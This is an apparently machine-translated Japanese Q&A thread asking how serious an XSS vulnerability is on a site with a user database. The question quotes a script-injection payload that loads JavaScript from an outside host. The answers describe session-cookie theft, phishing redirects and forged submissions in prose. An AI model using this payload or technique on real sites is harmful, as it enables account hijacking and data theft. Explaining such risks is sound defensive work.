XSS攻撃はどれほど深刻か

Question

私がアクセスするWebサイトでは、この種の攻撃が許可され、URLにGETが実装されています

<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

このページの他の多くの人と一緒に： http://ha.ckers.org/xss.html

このサイトにアクセスするには、アカウント（通常は有料）が必要ですが、それでもアクセスできます。

これはどれほど深刻な懸念事項ですか？また、ウェブサイトにどのような被害が及ぶ可能性がありますか？

少しだけ情報をお伝えしているとのことですが、一般的なアイデアはいいでしょう。ありがとう！

（ウェブサイトは、ユーザーアカウント、アドレス、電子メールなど[クレジットカードなし]とともに機密データを含む大規模なデータベースで運用されています）。

Jeff Ferland · Accepted Answer

サイトの所有者がJavaScriptで実行できることはすべて、XSS攻撃で実行できます。 [〜＃〜] dom [〜＃〜] の変更も含まれます。ページ全体を置き換えることができるため、Webサイトに出入りするすべてのデータを制御できます。比較的単純なスクリプトでCookieを読み取り、セッション情報を転送できます。これは、離れた場所にいるFiresheepのようなもので、ユーザーのアクセス資格情報を取得することによって偽装します。

さらに、ブラウザに影響を与えるあらゆる種類の攻撃をサイトの訪問者に紹介する可能性があります。

tdammers · Answer

XSSだけでは大きなダメージはありませんが、他の手法と簡単に組み合わせて強力な攻撃ベクトルを形成できます。いくつかの可能性は：

セッションハイジャック-多くの場合、セッションCookieはJavaScriptから読み取ることができます。 XSSを介して、ユーザーのセッションIDを読み取り、それを攻撃者に返すスクリプトをマウントできます（単純でありながら効果的な方法は、画像のURLがセッションIDを保持するDOMにimg要素を追加することです）。攻撃者は、セッションIDを自分のセッションCookieに入れて、認証されたセッションを乗っ取ることができます。

機密情報の取得-XSS脆弱性のあるページに機密情報が含まれている場合、それを攻撃者に送信します（セッションCookieと同様）。

誰かに代わってデータを投稿する-XSSを介して、ユーザーの同意なしにフォーム送信を傍受して変更したり、トリガーしたりすることさえできます。たとえば、Webメールクライアントを危険にさらすことができる場合は、[送信]ボタンをハイジャックして、受信者のリストに自分を追加することができます。

悪意のあるリダイレクト-XSSスクリプトは、ページ上の任意のリンクのURLを変更できます。これは悪用される可能性があり、たとえば、ユーザーを偽のログインページに誘導する可能性があります。実際にログインする代わりに、資格情報を攻撃者に送信しています。

ソーシャルエンジニアリング-エラーメッセージ、アラートなどを挿入することで、ユーザーをあらゆる種類の安全でない動作に騙すことができます。たとえば、攻撃者はユーザーに特定のファイルをダウンロードして開くように指示する可能性があります。そうするように要求するサイトがユーザーとの信頼度が高い場合、トロイの木馬やその他のマルウェアのマウントを可能にする、何も実行しない可能性があります。

また、多くの攻撃ベクトルは、ユーザーが侵害されたページを意識的に開かなくても機能することに注意してください。多くの場合、侵害されたページは、被害者がアクセスする可能性のあるフォーラムや他の場所からリンクされているページなど、他の場所にある目に見えないiframeに配置されます。。

Hendrik Brummermann · Answer

2つの側面があります。

XSSの脆弱性により、攻撃者はシステムで何でも、被害者に許可されていますを実行できます。被害者がスタッフのメンバーである場合、その被害者は電子メールアドレスや銀行の詳細などの個人情報にアクセスできる可能性があります。さらに、そのようなアカウントはコンテンツの変更を許可され、不適切なステートメントまたはブラウザのエクスプロイトに置き換えられる可能性があります。
ハッキングが成功すると、報道の報道が非常に悪くなる可能性があります。これは直接的なダメージよりもはるかに悪い場合があります。